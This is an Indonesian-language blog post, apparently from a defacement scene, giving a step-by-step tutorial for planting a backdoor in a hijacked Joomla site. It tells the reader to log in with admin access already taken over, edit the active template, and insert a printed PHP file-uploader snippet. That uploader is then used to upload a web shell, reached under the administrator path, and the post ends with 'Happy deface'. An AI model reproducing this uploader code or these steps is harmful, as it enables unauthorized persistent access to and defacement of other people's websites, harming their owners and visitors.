Cara upload Shell Backdoor di joomla
di postingan kali ini gue mau bikin tutorial cara upload shell di cms Joomla
kalian tau kan jomla apa :v
kalo gx tau w kasih tau nih :v
menurut om wiki sama bah gugel simak di bawah :v
Joomla! adalah Sistem manajemen konten (SMK atau CMS) yang bebas dan terbuka (free opensource) ditulis menggunakan PHP dan basisdata MySQL untuk keperluan di internet maupun intranet. Joomla pertamakali dirilis dengan versi 1.0.0. Fitur-fitur Joomla! diantaranya adalah sistem caching untuk peningkatan performansi, RSS, blogs, poling, dll. Joomla! menggunakan lisensi GPL.
Nah kurang lebih seperti itu :v
langsung aja ke pokok awal nya tadi :v
Bahan-bahan nya :
-shell backdoor
-akses ke web joomla nya buat yang belum tau cara nya ke sini cara deface Com_user
1.pertama lu masuk alias login ke web yang udah lu ambil alih akses nya
kalian akan otomatis ke sarang admin
2.kita masuk ke Templete manager liat gambar biar jelas
3.Nah setelah di buka kita lihat templete mana yang aktif atau ON cara liat nya ada tanda bintang di samping kanan
4.setelah di lihat templete mana yang aktif *liat gambar yang ada arah merah di bawah
5.setelah masuk kita cari templete yang on tadi
6.edit templete nya
7.masukan code uploader ini di templete nya
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>zeeb sukses gan<b><br><br>'; }
else { echo '<b>gak zeeb Gagal gan</b><br><br>'; }
}
?>
jadi seperti gambar di bawah
Dan di atas nya ada uploader
upload di situ shell kesayangan lu :v
buat akses shell nya
di www.site.com/administrator/namashel.php
Happy deface
Subscribe to:
Post Comments
(
Atom
)
No comments :
Post a Comment